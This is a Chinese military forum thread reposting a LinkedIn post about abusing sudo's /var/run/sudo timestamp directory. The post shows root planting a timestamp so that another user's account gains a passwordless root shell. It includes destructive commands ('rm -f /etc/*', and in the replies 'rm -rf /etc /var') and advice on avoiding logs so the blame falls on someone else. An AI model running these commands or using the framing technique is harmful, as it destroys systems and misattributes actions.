世界军事论坛 - 为何您不该在关键UNIX/Linux系统上使用sudo

送交者: 2017年11月24日03:26:58 于 [世界军事论坛] 发送悄悄话

以下是本人在Linkedin发的一个帖子：

I know sudo has many security issues along the years, and this is just one problem that's bad enough.
Here is the example attacker could use it to do bad things:
On one window:
root@analy:/$ tty
/dev/pts/1
root@analy:~$ su wgong
wgong@analy:/$

On another window:
root@analy:sudo$ pwd
/var/run/sudo
root@analy:sudo$ ls
_pam_timestamp_key caburiar davidn gagans jawadk nickc ponnusva sohenoor veeral zhoub
amirm chaumong eladn gambhisr jeesuna oswaldod qualys-scan sysadmin warrene
badris couttsa feroza gawalis jeffc pavlenkoi root taddm wgong
bobv covim forrestl greeffn minaa pomfretj silvae tothp zhens
root@analy:sudo$ touch wgong/1

Then on 1st window,
wgong@analy:/$ sudo bash
root@analy:/# rm -f /etc/*

Of course, you need to develop a simple C program to do the equivalent thing "su wgong" does to avoid being logged.

0%(0)

请注意，当wgong用户运行sudo时, - ausec 11/24/17 (537)

第一，超级用户想搞破坏还需这么麻烦？第二，sodo -v - 敌营十八年 11/24/17 (627)

回答 - ausec 11/24/17 (569)

cd / && rm -rf /etc /var 不露痕迹。 /无内容 - 敌营十八年 11/24/17 (482)

将/var删除会破坏这种攻击嫁祸于人的目的 - ausec 11/24/17 (494)

	实用资讯

北美最大最全的折扣机票网站
美国名厂保健品一级代理,花旗参,维他命,鱼油,卵磷脂,30天退货保证.买百免邮.

一周点击热帖

更多>>

一周回复热帖

历史上的今天：回复热帖

2016:	中国第一次没收新加坡的军用设备：做掉
2016:	彭丽媛舅告别式》采访侧记－盐商之子变
2015:	这新闻，简单的过分了（图）
2015:	土耳其在边境地区击落入侵战机俄国防部
2014:	永暑岛就地取土能填多大？
2014:	创立中国人自己的宗教，抗衡西方的各种
2013:	陸劃防空識別區美国务院、白宫和五角大
2013:	BBC: 日本“严重抗议”中国设东海防空识
2012:	军报：首批5名飞行员驾歼15完成在航母起
2012:	官方J15起降航母高清照片出炉了！！！